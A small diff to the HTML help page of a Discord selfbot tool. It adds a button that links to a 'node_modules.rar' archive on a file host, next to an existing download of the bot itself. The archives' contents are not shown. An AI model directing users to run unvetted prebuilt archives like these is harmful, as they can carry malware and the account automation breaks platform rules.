--- a/AtomicsSelfBotHelp.html
+++ b/AtomicsSelfBotHelp.html
@@ -33,6 +33,7 @@
 	</div>
 <a <button href='https://cdn.discordapp.com/attachments/696159573161148476/721301438239604736/Atomics_SelfBot_Public_V5.rar' class="button button4">Download Atomics SelfBot V5</button></a>
 	</div>
+<a <button="" href="http://download1075.mediafire.com/5wpmu2i9egag/2i7am62ult69qth/node_modules.rar" class="button button4">Download node_modules</a>
     <span></span></div>
 	</div>
     </section>
